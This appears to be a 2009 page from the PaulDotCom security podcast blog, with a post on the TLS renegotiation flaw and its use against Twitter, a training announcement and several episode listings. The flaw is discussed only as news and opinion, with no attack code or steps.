There is quite a lot to review/take in. Check out the full release notes here.
Be expecting a full review/discussion on our next show!!
All I can say is bring on 3.4 dev!
-strandjs
I was just kicking around the ridiculous speed of the new SSL vulnerability went from academic curiosity to exploit demonstration. For those of you that are catching up, this is not the Moxie stuff. The new attack allows you to insert arbitrary text into the beginning of an SSL or TLS session. At first, many researchers thought this to be interesting, but did not see it as a very effective attack in the real world. Then Anil Kurmus came and demonstrated how this attack can be used to steal credentials from Twitter. This attack was successful because of the very nature of the Twitter API. I would love to spend some time poking around to see how may other attack vectors there are for this.
There are a few things we need to take from this. First, obscure/novel attacks don't stay that way for long. We need to pay very close attention to any new attack that comes out that targets the very core protocols we use every day. Second, don't take any level of security, provided by various "secure" protocols, for granted. It is simply a matter of time before someone cracks them wide open. Finally, I read that initially some vendors were getting together in secret to look into how to fix this vulnerability. This sucks. I understand the need for vendors to get a head start, but the infosec community lives and breathes on information. There have been some serious attacks on the underlying infrastructure of how we do business every day: From Dan's DNS attacks, to BGP prefix attacks, and to the work that Moxie has done. This is just another attack on what we consider to be secure.
The point is to never make assumptions about how secure a particular component of your infrastructure is. It is just a matter of time before someone drives a Kenworth through it. If one attack to something like SSL compromises your entire security architecture, then your security architecture sucks.
-strandjs
John Strand will be teaching SANS Network Penetration Testing in
London from 11/30 to 12/6 2009, and SANS hacker techniques and Incident Response in New Orleans from 01/10/10 till 01/18/10.
The PaulDotCom crew talks about DNS enumeration, network packet analysis with Xplico, spilled COFEE, Pwning your own ATM machine, and more!
Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
Audio Feeds:
Larry finishes up a tech segment on Mass 0wnage with Jaseger and complimentary tools, and we discuss the stories of the week, including why MS patch Tuesday is a bad idea and tons of other hacks, tips, ticks, and security fail.
Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
Audio Feeds:
Tonight at 20:30 EST (8:30 PM), Mick Douglas promises a Swine Flu free technical segment on Network Packet Analyses. The crew then discusses the latest computer security news such as the worldwide jailbroken iPhone pwnages and much more!
When active, the live stream(s) can be found at:
PaulDotCom Livestream - All new with Video and Chat!
Please join us, enjoy the show live, and thanks for listening!
- Mick, Larry, John, Darren, Carlos, & Paul.
The PaulDotCom Crew interviews Ethan Galstad, the founder of Nagios open source project!
Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
Audio Feeds:
The sock puppets talk about letting your users access the Internet, bad Internet users, bad!
Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
Audio Feeds:
Paul, Larry, John, Mick, and Carlos are joined by a wide array of guests, including Anthony Jacobin (talking about Barcrawl a tool for scouring pastebin for interesting stuff), the entire Security Justice crew, Jack Daniel, and last, but not least (at least that's what we tell him) intern Darren!
Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
Audio Feeds: